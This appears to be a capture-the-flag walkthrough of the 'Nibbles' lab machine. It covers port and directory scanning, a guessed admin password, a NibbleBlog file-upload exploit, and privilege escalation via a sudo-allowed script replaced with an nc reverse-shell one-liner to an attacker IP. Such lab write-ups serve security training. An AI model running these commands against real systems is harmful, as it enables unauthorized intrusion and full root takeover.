nmap -sC -sV -A 10.10.10.75
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html)

Let the nmap full port scan run in the background as I explore the website further : nmap -p- --min-rate 10000 10.10.10.75. Only the two ports open, the
rest are filtered.

From the website source code I see ; <!-- /nibbleblog/ directory. Nothing interesting here! -->. So I proceed to http://10.10.10.75/nibbleblog/ and
realize it is powered by Nibbleblog. We proceed to scan for directories :
gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x php
/index.php            (Status: 200) 
/sitemap.php          (Status: 200)
/content              (Status: 301) 
/themes               (Status: 301)  
/feed.php             (Status: 200)                                             
/admin                (Status: 301)  
/admin.php            (Status: 200)                                            
/plugins              (Status: 301) 
/install.php          (Status: 200)                                               
/update.php           (Status: 200)                                          
/README               (Status: 200)                                            
/languages            (Status: 301)

We visit the site nibbleblog and append admin.php, here we are greeted with a login page. We try several combinations and admin : nibbles works.
Searching around for a nibbleblog exploit we come across the article : https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html

We proceed with the steps on the article :

1. Login to the compromised site
2. Go to images plugins and upload a reverse shell : http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
3. Listen with nc on our attacking machine
4. Visit the default upload url on the victim machine : http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
And we get a reverse shell and access to user flag!
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
773548e2145bf9ed777abe89a930560b
===============Priv Escalation====================
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    
Write a simple reverse shell, start a simple server and upload shell on victim's server:
#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 1234 >/tmp/f

python3 -m http.server
wget http://10.10.14.13:8000/monitor.sh
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh OR sudo ./monitor.sh
Reverse shell here:
Ncat: Connection from 10.10.10.75:44798.
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
bc6c0b710e715d9568983118f307e448
    ==============Root user pawned! Bye =====================
